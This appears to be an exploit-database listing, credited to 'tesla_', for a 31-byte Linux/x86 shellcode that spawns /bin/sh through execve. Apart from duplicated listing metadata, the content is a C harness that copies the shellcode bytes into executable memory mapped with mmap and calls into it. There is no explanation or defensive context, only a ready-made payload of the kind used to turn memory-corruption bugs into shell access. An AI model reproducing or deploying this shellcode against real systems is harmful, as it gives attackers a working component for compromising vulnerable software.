Linux/x86 execve("/bin/sh", [ "/bin/sh", NULL ], NULL) shellcode 31 bytes
| EKU-ID: 5644 | CVE: | OSVDB-ID: |
| Author: tesla_ | Published: 2016-06-27 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 5644 | CVE: | OSVDB-ID: |
| Author: tesla_ | Published: 2016-06-27 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/mman.h> #include <unistd.h> /* * Linux/x86: 31 bytes execve("/bin/sh", [ "/bin/sh", NULL ], NULL) shellcode * * tesla_ (gandung@ppp.cylab.cmu.edu) */char *shellcode = "\x31\xc0\x31\xdb\x50\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d" "\x54\x24\x0c\x8d\x4c\x24\x08\x8d\x1c\x24\xb0\x0b\xcd\x80"; int main(void) { char (*payload)(size_t a, size_t b, size_t c) __attribute__((regparm(3))); payload = mmap(NULL, sysconf(_SC_PAGESIZE), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0); memcpy(payload, shellcode, strlen(shellcode)); __asm__ __volatile__("call *%%eax" : : "r"(payload)); return (0); }